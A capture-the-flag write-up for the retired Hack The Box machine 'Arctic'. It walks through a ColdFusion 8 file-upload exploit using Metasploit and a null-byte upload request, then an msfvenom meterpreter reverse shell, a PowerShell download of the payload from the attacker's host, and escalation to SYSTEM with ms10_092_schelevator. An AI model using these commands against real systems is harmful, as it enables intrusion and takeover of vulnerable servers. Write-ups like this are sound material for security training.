This is the write-up for the box Arctic that got retired at the 7th July 2017. My IP address was 10.10.14.13 while I did this.
Let's put this in our hosts file:
10.10.10.11 arctic.htb
Starting with a Nmap scan:
nmap -sC -sV -o nmap/arctic.nmap 10.10.10.11
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Browsing to port 8500 gives us an index page with two folders called CFIDE and cfdocs. In the path CFIDE/administrator/ we get forwarded to a web page that displays a login prompt for Adobe Coldfusion 8.
Looking for vulnerabilities shows an ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit) for this version of Adobe Coldfusion that has a Metasploit module we are going to use.
searchsploit coldfusion
In Metasploit we can use the module now:
use exploit/windows/http/coldfusion_fckeditor
set RHOSTS 10.10.10.11
set RPORT 8500
As the server responds very slowly to requests and the payload does not wait for long, this will fail. Let us examine why this fails by sending the request through Burpsuite.
Burpsuite: Proxy --> Options --> Add Proxy Listener
- Bind to port: 8500
- Bind to address: 127.0.0.1
- Redirect to host: 10.10.10.11
- Redirect to port: 8500
Now we can browse to localhost:8500 to execute the Metasploit payload locally and examine the traffic in Burpsuite.
set RHOSTS 127.0.0.1
The POST request we are sending looks like this:
POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/G.jsp%00 HTTP/1.1
Host: 127.0.0.1:8500
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: multipart/form-data; boundary=_Part_559_3663607441_2109420688
Content-Length: 1588
Connection: close
--_Part_559_3663607441_2109420688
Content-Disposition: form-data; name="newfile"; filename="KCNKUAKE.txt"
Content-Type: application/x-java-archive
(...payload code...)
The problem is the NULL Byte at the end of the folder (G.jsp%00) that terminates the request before the filename (KCNKUAKE.txt) can be created. The response is:
window.parent.OnUploadCompleted( 0, "/userfiles/file/G.jsp/KCNKUAKE.txt", "KCNKUAKE.txt", "0" );
If we manually navigate to the path 10.10.10.11:8500/userfiles/file/G.jsp and start a listener on port 4444 we will get a reverse shell if we wait a while.
Now we have a session on the box with the user tolis. As we still want a Meterpreter session we will create a payload with Msfvenom and upload that to the box.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=9001 -f exe > exploit.exe
To execute the payload code we start a web server on our local machine and download it from the box with Powershell:
powershell "IEX(New-Object Net.WebClient).downloadFile('http://10.10.14.13:8000/exploit.exe','exploit.exe')"
After executing this will start a meterpreter session on Metasploit.
Now we can use the local_exploit_suggester module to enumerate for vulnerabilites:
use post/multi/recon/local_exploit_suggester
Migrate the meterpreter session into a 64-bit process before running the exploit. We will use the suggested exploit exploit/windows/local/ms10_092_schelevator tp escalate our privileges.
use exploit/windows/local/ms10_092_schelevator
set session 1
run
When this exploit finishes we get a session back as NT Authority/SYSTEM and finished the box!